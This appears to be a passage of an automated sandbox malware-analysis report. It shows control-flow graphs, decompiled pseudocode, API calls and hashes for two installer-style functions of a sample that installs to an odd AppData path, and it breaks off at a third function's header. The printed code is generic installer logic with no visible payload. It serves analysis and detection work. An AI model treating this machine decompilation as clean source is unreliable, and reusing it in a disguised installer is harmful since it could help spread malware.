                                                            control_flow_graph 302 403a3d-403a55 call 406663 305 403a57-403a67 call 4061b5 302->305 306 403a69-403a9a call 40613e 302->306 315 403abd-403ae6 call 403d02 call 405cd7 305->315 311 403ab2-403ab8 lstrcatA 306->311 312 403a9c-403aad call 40613e 306->312 311->315 312->311 320 403aec-403af1 315->320 321 403b6d-403b75 call 405cd7 315->321 320->321 322 403af3-403b17 call 40613e 320->322 327 403b83-403ba8 LoadImageA 321->327 328 403b77-403b7e call 4062ea 321->328 322->321 329 403b19-403b1b 322->329 331 403c29-403c31 call 40140b 327->331 332 403baa-403bda RegisterClassA 327->332 328->327 333 403b2c-403b38 lstrlenA 329->333 334 403b1d-403b2a call 405c14 329->334 346 403c33-403c36 331->346 347 403c3b-403c46 call 403d02 331->347 335 403be0-403c24 SystemParametersInfoA CreateWindowExA 332->335 336 403cf8 332->336 340 403b60-403b68 call 405be9 call 406257 333->340 341 403b3a-403b48 lstrcmpiA 333->341 334->333 335->331 339 403cfa-403d01 336->339 340->321 341->340 345 403b4a-403b54 GetFileAttributesA 341->345 350 403b56-403b58 345->350 351 403b5a-403b5b call 405c30 345->351 346->339 355 403c4c-403c66 ShowWindow call 4065f5 347->355 356 403ccf-403cd0 call 40544a 347->356 350->340 350->351 351->340 363 403c72-403c84 GetClassInfoA 355->363 364 403c68-403c6d call 4065f5 355->364 359 403cd5-403cd7 356->359 361 403cf1-403cf3 call 40140b 359->361 362 403cd9-403cdf 359->362 361->336 362->346 365 403ce5-403cec call 40140b 362->365 368 403c86-403c96 GetClassInfoA RegisterClassA 363->368 369 403c9c-403cbf DialogBoxParamA call 40140b 363->369 364->363 365->346 368->369 373 403cc4-403ccd call 40398d 369->373 373->339
                                                            C-Code - Quality: 96%
                                                            			E00403A3D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x452430;
				_t17 = E00406663(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x43c090;
					 *0x483000 = 0x30;
					 *0x483001 = 0x78;
					 *0x483002 = 0;
					E0040613E(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x43c090, 0);
					__eflags =  *0x43c090;
					if(__eflags == 0) {
						E0040613E(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x43c090, 0);
					}
					lstrcatA(0x483000, _t74);
				} else {
					E004061B5(0x483000,  *_t17() & 0x0000ffff);
				}
				E00403D02(_t71, _t84);
				_t80 = "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes";
				 *0x4524a0 =  *0x452438 & 0x00000020;
				 *0x4524bc = 0x10000;
				if(E00405CD7(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") != 0) {
					L16:
					if(E00405CD7(_t92, _t80) == 0) {
						E004062EA(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x452420, 0x67, 1, 0, 0, 0x8040);
					 *0x44e408 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D02(_t71, __eflags);
							__eflags =  *0x4524c0;
							if( *0x4524c0 != 0) {
								_t28 = E0040544A(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x44e3ec;
								if( *0x44e3ec == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x43c070, 5); // executed
							_t34 = E004065F5("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065F5("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x44e3c0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x44e3c0);
								 *0x44e3e4 = _t81;
								RegisterClassA(0x44e3c0);
							}
							_t39 = DialogBoxParamA( *0x452420,  *0x44e400 + 0x00000069 & 0x0000ffff, 0, E00403DDA, 0); // executed
							E0040398D(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x452420;
						 *0x44e3c4 = E00401000;
						 *0x44e3d0 =  *0x452420;
						 *0x44e3d4 = _t25;
						 *0x44e3e4 = 0x40a1f4;
						if(RegisterClassA(0x44e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x43c070 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x452420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x44a3c0;
					E0040613E(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x452458, 0x44a3c0, 0);
					_t57 =  *0x44a3c0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x44a3c1;
						 *((char*)(E00405C14(0x44a3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406257(_t80, E00405BE9(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C30(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                            0x00403a43
                                                            0x00403a4c
                                                            0x00403a53
                                                            0x00403a55
                                                            0x00403a69
                                                            0x00403a7b
                                                            0x00403a82
                                                            0x00403a89
                                                            0x00403a8f
                                                            0x00403a94
                                                            0x00403a9a
                                                            0x00403aad
                                                            0x00403aad
                                                            0x00403ab8
                                                            0x00403a57
                                                            0x00403a62
                                                            0x00403a62
                                                            0x00403abd
                                                            0x00403ac7
                                                            0x00403ad0
                                                            0x00403ad5
                                                            0x00403ae6
                                                            0x00403b6d
                                                            0x00403b75
                                                            0x00403b7e
                                                            0x00403b7e
                                                            0x00403b94
                                                            0x00403b9a
                                                            0x00403ba8
                                                            0x00403c29
                                                            0x00403c31
                                                            0x00403c3b
                                                            0x00403c40
                                                            0x00403c46
                                                            0x00403cd0
                                                            0x00403cd5
                                                            0x00403cd7
                                                            0x00403cf3
                                                            0x00000000
                                                            0x00403cf3
                                                            0x00403cd9
                                                            0x00403cdf
                                                            0x00403ce7
                                                            0x00403ce7
                                                            0x00000000
                                                            0x00403cdf
                                                            0x00403c54
                                                            0x00403c5f
                                                            0x00403c64
                                                            0x00403c66
                                                            0x00403c6d
                                                            0x00403c6d
                                                            0x00403c78
                                                            0x00403c80
                                                            0x00403c82
                                                            0x00403c84
                                                            0x00403c8d
                                                            0x00403c90
                                                            0x00403c96
                                                            0x00403c96
                                                            0x00403cb5
                                                            0x00403cc6
                                                            0x00000000
                                                            0x00403ccb
                                                            0x00403c33
                                                            0x00403c35
                                                            0x00000000
                                                            0x00403baa
                                                            0x00403baa
                                                            0x00403bb6
                                                            0x00403bc0
                                                            0x00403bc6
                                                            0x00403bcb
                                                            0x00403bda
                                                            0x00403cf8
                                                            0x00403cf8
                                                            0x00000000
                                                            0x00403cf8
                                                            0x00403be9
                                                            0x00403c24
                                                            0x00000000
                                                            0x00403c24
                                                            0x00403aec
                                                            0x00403aec
                                                            0x00403aef
                                                            0x00403af1
                                                            0x00000000
                                                            0x00000000
                                                            0x00403afb
                                                            0x00403b0b
                                                            0x00403b10
                                                            0x00403b17
                                                            0x00000000
                                                            0x00000000
                                                            0x00403b1b
                                                            0x00403b1d
                                                            0x00403b2a
                                                            0x00403b2a
                                                            0x00403b32
                                                            0x00403b38
                                                            0x00403b60
                                                            0x00403b68
                                                            0x00000000
                                                            0x00403b4a
                                                            0x00403b4b
                                                            0x00403b54
                                                            0x00403b5a
                                                            0x00403b5b
                                                            0x00000000
                                                            0x00403b5b
                                                            0x00403b56
                                                            0x00403b58
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403b58
                                                            0x00403b38

                                                            APIs
                                                              • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                              • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                            • lstrcatA.KERNEL32(00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754,00485000,?,0047B000,00000009,0000000B), ref: 00403AB8
                                                            • lstrlenA.KERNEL32(Copy failed,?,?,?,Copy failed,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754), ref: 00403B2D
                                                            • lstrcmpiA.KERNEL32(?,.exe,Copy failed,?,?,?,Copy failed,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000), ref: 00403B40
                                                            • GetFileAttributesA.KERNEL32(Copy failed,?,0047B000,00000009,0000000B), ref: 00403B4B
                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes), ref: 00403B94
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403BD1
                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                            • CreateWindowExA.USER32 ref: 00403C1E
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403C54
                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0044E3C0), ref: 00403C80
                                                            • GetClassInfoA.USER32(00000000,RichEdit,0044E3C0), ref: 00403C8D
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403C96
                                                            • DialogBoxParamA.USER32 ref: 00403CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: .DEFAULT\Control Panel\International$.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Control Panel\Desktop\ResourceLocale$Copy failed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 1975747703-1132855158
                                                            • Opcode ID: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction ID: 9ed41b13b3066df8ef4fe5e21b3ba9d2433b63f5b2cc2a01767d3bc771330ebd
                                                            • Opcode Fuzzy Hash: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction Fuzzy Hash: A261B375644344AEE611AF669E45F3B3A6CEB4670EF00043FF941B62E3CA7C99019B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004062EA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 198stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 598 4062ea-4062f5 599 4062f7-406306 598->599 600 406308-40631e 598->600 599->600 601 406512-406516 600->601 602 406324-40632f 600->602 604 406341-40634b 601->604 605 40651c-406526 601->605 602->601 603 406335-40633c 602->603 603->601 604->605 606 406351-406358 604->606 607 406531-406532 605->607 608 406528-40652c call 406257 605->608 609 406505 606->609 610 40635e-406392 606->610 608->607 612 406507-40650d 609->612 613 40650f-406511 609->613 614 4064b2-4064b5 610->614 615 406398-4063a2 610->615 612->601 613->601 618 4064e5-4064e8 614->618 619 4064b7-4064ba 614->619 616 4063a4-4063ad 615->616 617 4063bf 615->617 616->617 622 4063af-4063b2 616->622 625 4063c6-4063cd 617->625 620 4064f6-406503 lstrlenA 618->620 621 4064ea-4064f1 call 4062ea 618->621 623 4064ca-4064d6 call 406257 619->623 624 4064bc-4064c8 call 4061b5 619->624 620->601 621->620 622->617 630 4063b4-4063b7 622->630 634 4064db-4064e1 623->634 624->634 626 4063d2-4063d4 625->626 627 4063cf-4063d1 625->627 632 4063d6-4063f9 call 40613e 626->632 633 40640d-406410 626->633 627->626 630->617 635 4063b9-4063bd 630->635 646 406499-40649d 632->646 647 4063ff-406408 call 4062ea 632->647 639 406420-406423 633->639 640 406412-40641e GetSystemDirectoryA 633->640 634->620 638 4064e3 634->638 635->625 642 4064aa-4064b0 call 406535 638->642 644 406490-406492 639->644 645 406425-406433 GetWindowsDirectoryA 639->645 643 406494-406497 640->643 642->620 643->642 643->646 644->643 648 406435-40643f 644->648 645->644 646->642 651 40649f-4064a5 lstrcatA 646->651 647->643 653 406441-406444 648->653 654 406459-40646f SHGetSpecialFolderLocation 648->654 651->642 653->654 658 406446-40644d 653->658 655 406471-40648b SHGetPathFromIDListA CoTaskMemFree 654->655 656 40648d 654->656 655->643 655->656 656->644 659 406455-406457 658->659 659->643 659->654
                                                            C-Code - Quality: 72%
                                                            			E004062EA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t50;
				char _t52;
				char _t54;
				void* _t62;
				char* _t63;
				signed int _t77;
				char _t85;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t89 = __esi;
				_t86 = __edi;
				_t62 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x44e3fc - 4 + _t36 * 4);
				}
				_push(_t62);
				_push(_t89);
				_push(_t86);
				_t63 = _t36 +  *0x452458;
				_t37 = 0x44a3c0;
				_t87 = 0x44a3c0;
				if(_a4 >= 0x44a3c0 && _a4 - 0x44a3c0 < 0x4000) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t85 =  *_t63;
					if(_t85 == 0) {
						break;
					}
					__eflags = _t87 - _t37 - 0x2000;
					if(_t87 - _t37 >= 0x2000) {
						break;
					}
					_t63 = _t63 + 1;
					__eflags = _t85 - 4;
					_a8 = _t63;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t85;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t63;
							_t87 =  &(_t87[1]);
							_t63 = _t63 + 1;
						}
						continue;
					}
					_t39 =  *((char*)(_t63 + 1));
					_t77 =  *_t63;
					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
					_v24 = _t77;
					_v28 = _t77 | 0x00000080;
					_v16 = _t39;
					_v20 = _t39 | 0x00000080;
					_t63 = _a8 + 2;
					__eflags = _t85 - 2;
					if(_t85 != 2) {
						__eflags = _t85 - 3;
						if(_t85 != 3) {
							__eflags = _t85 - 1;
							if(_t85 == 1) {
								__eflags = (_t39 | 0xffffffff) - _t94;
								E004062EA(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
							}
							L42:
							_t87 =  &(_t87[lstrlenA(_t87)]);
							_t37 = 0x44a3c0;
							continue;
						}
						__eflags = _t94 - 0x1d;
						if(_t94 != 0x1d) {
							__eflags = (_t94 << 0xd) + 0x453000;
							E00406257(_t87, (_t94 << 0xd) + 0x453000);
						} else {
							E004061B5(_t87,  *0x452428);
						}
						__eflags = _t94 + 0xffffffeb - 7;
						if(_t94 + 0xffffffeb < 7) {
							L33:
							E00406535(_t87);
						}
						goto L42;
					}
					__eflags =  *0x4524dc;
					_t96 = 2;
					if( *0x4524dc != 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4524a4;
						if( *0x4524a4 != 0) {
							_t96 = 4;
						}
						__eflags = _t77;
						if(__eflags >= 0) {
							__eflags = _t77 - 0x25;
							if(_t77 != 0x25) {
								__eflags = _t77 - 0x24;
								if(_t77 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x2000);
									_t96 = 0;
								}
								while(1) {
									__eflags = _t96;
									if(_t96 == 0) {
										goto L30;
									}
									_t50 =  *0x452424;
									_t96 = _t96 - 1;
									__eflags = _t50;
									if(_t50 == 0) {
										L26:
										_t52 = SHGetSpecialFolderLocation( *0x452428,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
										__eflags = _t52;
										if(_t52 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t87);
										_v12 = _t52;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t54 =  *_t50( *0x452428,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x2000);
							goto L30;
						} else {
							E0040613E((_t77 & 0x0000003f) +  *0x452458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x452458, _t87, _t77 & 0x00000040);
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062EA(_t63, _t87, _t96, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags =  *0x4524de - 0x45a;
					if( *0x4524de >= 0x45a) {
						goto L13;
					}
					__eflags = _t39 - 0x23;
					if(_t39 == 0x23) {
						goto L13;
					}
					__eflags = _t39 - 0x2e;
					if(_t39 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00406257(_a4, _t37);
			}

























                                                            0x004062ea
                                                            0x004062ea
                                                            0x004062ea
                                                            0x004062f0
                                                            0x004062f5
                                                            0x00406306
                                                            0x00406306
                                                            0x0040630e
                                                            0x0040630f
                                                            0x00406310
                                                            0x00406311
                                                            0x00406314
                                                            0x0040631c
                                                            0x0040631e
                                                            0x00406335
                                                            0x00406338
                                                            0x00406338
                                                            0x00406512
                                                            0x00406512
                                                            0x00406516
                                                            0x00000000
                                                            0x00000000
                                                            0x00406345
                                                            0x0040634b
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406352
                                                            0x00406355
                                                            0x00406358
                                                            0x00406505
                                                            0x0040650f
                                                            0x00406511
                                                            0x00406511
                                                            0x00406507
                                                            0x00406509
                                                            0x0040650b
                                                            0x0040650c
                                                            0x0040650c
                                                            0x00000000
                                                            0x00406505
                                                            0x0040635e
                                                            0x00406362
                                                            0x00406372
                                                            0x00406379
                                                            0x0040637c
                                                            0x00406384
                                                            0x00406387
                                                            0x0040638e
                                                            0x0040638f
                                                            0x00406392
                                                            0x004064b2
                                                            0x004064b5
                                                            0x004064e5
                                                            0x004064e8
                                                            0x004064ed
                                                            0x004064f1
                                                            0x004064f1
                                                            0x004064f6
                                                            0x004064fc
                                                            0x004064fe
                                                            0x00000000
                                                            0x004064fe
                                                            0x004064b7
                                                            0x004064ba
                                                            0x004064cf
                                                            0x004064d6
                                                            0x004064bc
                                                            0x004064c3
                                                            0x004064c3
                                                            0x004064de
                                                            0x004064e1
                                                            0x004064aa
                                                            0x004064ab
                                                            0x004064ab
                                                            0x00000000
                                                            0x004064e1
                                                            0x00406398
                                                            0x004063a1
                                                            0x004063a2
                                                            0x004063bf
                                                            0x004063bf
                                                            0x004063c6
                                                            0x004063c6
                                                            0x004063cd
                                                            0x004063d1
                                                            0x004063d1
                                                            0x004063d2
                                                            0x004063d4
                                                            0x0040640d
                                                            0x00406410
                                                            0x00406420
                                                            0x00406423
                                                            0x0040642b
                                                            0x00406431
                                                            0x00406431
                                                            0x00406490
                                                            0x00406490
                                                            0x00406492
                                                            0x00000000
                                                            0x00000000
                                                            0x00406435
                                                            0x0040643c
                                                            0x0040643d
                                                            0x0040643f
                                                            0x00406459
                                                            0x00406467
                                                            0x0040646d
                                                            0x0040646f
                                                            0x0040648d
                                                            0x0040648d
                                                            0x0040648d
                                                            0x00000000
                                                            0x0040648d
                                                            0x00406475
                                                            0x0040647e
                                                            0x00406481
                                                            0x00406487
                                                            0x0040648b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040648b
                                                            0x00406441
                                                            0x00406444
                                                            0x00000000
                                                            0x00000000
                                                            0x00406453
                                                            0x00406455
                                                            0x00406457
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406457
                                                            0x00000000
                                                            0x00406490
                                                            0x00406418
                                                            0x00000000
                                                            0x004063d6
                                                            0x004063f1
                                                            0x004063f6
                                                            0x004063f9
                                                            0x00406499
                                                            0x00406499
                                                            0x0040649d
                                                            0x004064a5
                                                            0x004064a5
                                                            0x00000000
                                                            0x0040649d
                                                            0x00406403
                                                            0x00406494
                                                            0x00406494
                                                            0x00406497
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406497
                                                            0x004063d4
                                                            0x004063a4
                                                            0x004063ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004063af
                                                            0x004063b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004063b4
                                                            0x004063b7
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b9
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b7
                                                            0x0040651c
                                                            0x00406526
                                                            0x00406532
                                                            0x00406532
                                                            0x00000000

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(Copy failed,00002000), ref: 00406418
                                                            • GetWindowsDirectoryA.KERNEL32(Copy failed,00002000,?,Copy failed,00000000,004053B0,Copy failed,00000000), ref: 0040642B
                                                            • SHGetSpecialFolderLocation.SHELL32(004053B0,7555110C,?), ref: 00406467
                                                            • SHGetPathFromIDListA.SHELL32(7555110C,Copy failed), ref: 00406475
                                                            • CoTaskMemFree.OLE32(7555110C), ref: 00406481
                                                            • lstrcatA.KERNEL32(Copy failed,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                            • lstrlenA.KERNEL32(Copy failed,?,Copy failed,00000000,004053B0,Copy failed,00000000,00000000,0042CE48,7555110C), ref: 004064F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Copy failed$Copy failed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 717251189-2821452881
                                                            • Opcode ID: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction ID: ebe98ae1178673def3e02426a949122db7229e586474bd24546af65fb667a20e
                                                            • Opcode Fuzzy Hash: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction Fuzzy Hash: D5611571900204AFEF219F24DD94B7E3BA4AB06714F12403FE943BA2D2D67C89A1DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402F0C Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
